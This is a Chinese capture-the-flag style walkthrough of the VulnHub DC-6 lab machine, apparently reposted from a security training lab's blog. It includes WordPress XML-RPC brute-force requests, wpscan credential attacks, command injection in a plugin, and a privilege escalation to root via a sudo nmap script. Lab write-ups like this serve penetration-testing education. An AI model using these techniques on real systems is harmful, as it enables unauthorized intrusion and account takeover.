【VulnHub靶机系列】DC6

最新推荐文章于 2023-02-28 11:38:09 发布
最新推荐文章于 2023-02-28 11:38:09 发布
阅读量197 收藏
点赞数
文章标签: linux java shell python ubuntu
原文链接:https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247502347&idx=1&sn=c2477765f16d4acca85066e70c595f69&chksm=fc3c730acb4bfa1c04468de75a8d84c68504637b2b48f7ceebb45e3691d331f9d0b7ee31f7b6&scene=126&&sessionid=0
版权

文章来源|MS08067 安全实验室

本文作者:大方子(Ms08067实验室核心成员)

主机信息

Kali:192.168.0.128 DC-6:192.168.0.130

实验过程

先找到DC-6的IP地址

sudo arp-scan --interface eth0 192.168.0.1/24

2aaee93785944d563ae8b0b3bb27aa2b.png


然后用Nmap对DC-6进行扫描

sudo nmap -sS -sC -sV -p- 192.168.0.130

ea1557b2b0848143d514c82a9f553cc5.png


可以看到主机开放了80 和 22端口

通过扫描结果可以看出,通过80端口访问DC-6的web服务会被重定向到http://wordy/

这里我们需要修改下Host,让http://wordy/指向192.168.0.130

3a5692669beeaff1e0589ffd4340eb55.png


这里要注意是访问的是http://wordy/而不是http://wordy.com

fafc1dc518509289f1a9a8e541049702.png


80ccc91963b0b27dd699db7ec6f8165d.png


可以看到是wp来进行搭建的,跟DC-2类似

这里我们先用wpscan扫描下看看当前网站看看有没有什么有用的信息

wpscan --url http://wordy/

可以看到wp开启了XML-RPC

8b6c76661b871dc07de81c9b01cd5273.png

当前的wp版本是5.1.1

d63e31153dde8230020477dac9f79e23.png

这里稍微介绍下WP的XML-RPC的漏洞知识

我们可以通过XML-RPC,查看目标网站支持的方法

POST /xmlrpc.php HTTP/1.1
Host: wordy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

119a3180b87cd2dc4b698493a332d8e4.png


一般情况下,wordpress的管理后台都会设置账号登录失败次数限制,因此,可以通过xmlprc.php接口来进行爆破。通常会使用wp.getUserBlogs、wp.getCategories和metaWeblog.getUsersBlogs这个方法来进行爆破,也可以使用其他的方法。

586d90281822a08ef9c9f0e84b093557.png

参数构造如下,如果爆破成功则会返回相应的博客内容

POST /xmlrpc.php HTTP/1.1
Host: wordy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 174

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

99bbc2e585f41725233f9165c579d95d.png


在wp版本低于3.5.1中还可以利用pingback.ping进行端口扫描、文件读取的功能这里不展开描述

接下来对网站的用户进行遍历

wpscan --url http://wordy/ -e u

88c0b3b24dbf2dcaf66e13ee20b55489.png


将这些用户名记录下来,爆破用

a6db07896d4b505aa65af182e458647b.png


wpscan --url http://wordy/ -U wp-users -P /usr/share/wordlists/rockyou.txt

f701b274907a254956e4817b140300bf.png


得到账号密码

账号:mark 密码:helpdesk01

wp默认的后台地址为/wp-admin

在Activity monitor/tools中找到lookup,可以命令拼接来进行命令执行

3df5e8e73611f5a6ca8513caf986a958.png


常见的命令连接符有(|,&&,||这三个连接符都是Windows系统与Linux系统共有的,而&是Windows系统特有,;是Linux系统特有的)

A|B:无论执行的A命令是否正确,B命令都执行
A&&B:只有在A命令成功执行的前提下,B命令才可以执行
A||B:只有在A命令没有执行失败的前提下,B命令才可以执行
A&B:不管A是否执行成功,B命令都会执行
A;B:不管A是否执行成功,B命令都会执行

967889a23eecc0aad91eb16ca42f9f78.png


接下来开始反弹shell

5ea38a3f0ae389999d269696626a32a7.png


85e9f644e751372201bba0c5564f423b.png


在jens目录下发现backups.sh脚本

e7cc61c892723a15b5dbb305e66d5fc2.png


想尝试编辑这个脚本,发现没有权限

01ecbcb88338cd9dd2752cbba85b23da.png

接着继续翻找信息,找到graham的账号信息

bd33384d0656550f656c74b735222ac5.png

graham - GSo7isUM1D4

直接通过SSH登录到graham

d195dc3a1f71056679c8dee5db4d2124.png

查看其sudo权限,可以看到graham可以不用密码,以jens权限来运行/home/jens/backups.sh脚本

f9711f5387c3cd8d58ed268a9a880704.png


修改backups.sh来反弹jens的权限

badd511a15f4d49c8262204393af9435.png

然后以jens身份来执行脚本

sudo -u jens /home/jens/backups.sh

3cfb66fb33ead5f19778c96ce95c03fa.png


得到jens的权限

1903d18d37c03219c5b0b3041cd04d8d.png

查看Jens的sudo权限,可以看到jens可以无密码通过root权限来运行nmap

415bcb207eabcbf7d402817e6875f789.png

那么接下来就通过nmap来进行提权

echo 'os.execute("/bin/bash")' > root.sh
sudo nmap --script=root.sh

得到root权限

948f9b906fa56c4ef03f09c56047423c.png

—  实验室旗下直播培训课程  —

9959f48ada3f85b38d56b7d5514dbcd2.jpeg

bcb5cf80c71379fa7df16fdca45bc342.jpeg

c25a9f99fe0665d9d9529e37006e1e84.jpeg

407ee72ee1060819a8f7f706c7f03ea6.jpeg

3c9a33d0bb2cb40a3f1b20e532ecc63a.jpeg


来和10000+位同学加入MS08067一起学习吧!

fd79cc9ff41bcfbdbbfaa55911ed6ff1.gif

Ms08067安全实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机DC-6
m0_60911102的博客
11-30 920
Vulnhub靶机DC-6
vulnhub靶场之DC-6
最新发布
qq_58091216的博客
01-11 1134
只有一个flag。
vulnhubdc6
qq_54030686的博客
06-14 853
DC系列第六篇,整体而言难度较低,此篇之后,不再进行较为细致的篇幅 总体逻辑:话不多说,开始干 主机发现,端口扫描 目标IP为192.168.43.140 开放两个端口22 和80 端口,其中80端口对应的服务为wordy,修改hosts文件,路径为/etc/hosts,添加值 22端口尝试进行爆破,采用用户名top50,字典使用弱口令top100进行尝试 未发现相应结果 进行指纹识别 发现为wordpress框架,使用wordpress专用扫描器进行检测,使用-e参数爆破用户 存在5个用户复制变异成字典
Vulnhub-DC-6靶机实战(Nmap提权)
御七彩虹猫
05-19 1533
Vulnhub-DC-6靶机实战(Nmap提权)
Vulnhub DC-6
Pai_Space
03-11 770
Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn't an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to g.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
[Vulnhub] DC-6
weixin_63231007的博客
01-29 422
DC系列靶机-第六弹(wp-Activity monitor插件rce漏洞getshell&nmap提权)
DC靶机系列DC-6
Ays.Ie的博客
02-28 577
本篇文章为DC系列第6个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
Vulnhub靶机实战——DC-6
冠霖L的博客
10-28 3877
靶机DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 15虚拟机软件 DC-6靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.142 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.142...
Vulnhub_DC-6
高野02blog
01-20 141
Vulnhub提示: 扫描靶机IP地址:nmap -sP 192.168.10.0/24 扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129 开放端口22,80 访问80端口发现URL被重定向到wordy 我们需要在host文件中添加 文件位置 /etc/hosts 可以访问到啦 扫描下目录结构吧, 御剑扫描 发现是wordpress站点 使用WPscan扫描 一款专注于wordpress站点扫描工具 wpscan -url
Vulnhub 靶机实战系列DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4556
Vulnhub 靶机实战系列DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发现开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
vulnhub渗透测试靶机DC-6
weixin_46128614的博客
01-19 469
靶机地址:https://www.vulnhub.com/entry/dc-6,315/ nmap –sS –sV –p- -T5 dirb跑一下,全是wp的目录 上wpscan 改一下hosts 加一条 192.168.49.20 wordy 没有发现漏洞 发现几个用户 逐一爆破吧 开开心心爆了半个小时,进度0.1%,这么多用户感觉爆破思路不会错,看了一眼师傅的wp,原来作者在vulnhu...
[渗透测试][Kali]对DC-6靶机进行渗透测试
多皮哦的博客
07-18 2647
DC-6靶机进行渗透测试 本例使用的工具主要有:wpscan,BurpSuite,nc(瑞士军刀) 1. 搭建渗透平台 Kali 2018, DC-6靶机, VMWare虚拟机平台 DC-6靶机的渗透需要用到DC作者在https://www.vulnhub.com/entry/dc-6,315/给出的提示 发现主机这个步骤省略 2. 枚举用户名 站点使用了wordpress,考虑使用wps...
Vulnhub-DC-6
T1me
10-30 229
入门系列第三弹DC-6 基本信息 下载地址:DC-6 靶机:vmware,192.168.172.138 攻击机:kali2 Flag:1个 渗透过程 0x01 nmap扫描 扫描一下,只有22和80开放,然后注意一下作者告诉我们配置一下host了,记得改成wordy。 0x02 漏洞发现 访问wordy后,发现还是和之前的dc-2一个界面啊,估计又是wp吧。 访问一下/wp-admin成功之后,确认就是wp了,wpscan一样先扫一手用户名。然后保存一下,准备爆破。 wpscan --url http
VULNHUB靶机渗透——DC-6(Activity monitor远程命令执行漏洞利用)
aarong的博客
12-28 3307
靶机来源:https://www.vulnhub.com/entry/dc-6,315/ 1.扫描(arp-scan和nmap) 可以看到靶机开放了两个端口分别是22和80 2.打开浏览器浏览靶机网页 发现打不开这个网站,分析原因发现URL上并没有显示刚刚输入的靶机IP,而是变成了wordy,那么有可能是本地hosts文件没有解析到这个IP。 所以打开hosts文件绑定靶机IP: 路径为/etc/hosts 修改为: 靶机IP wordy 再次打开浏览器访问就可以访问成功了: 发现这个网页使用的是非
vulnhub靶机系列
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值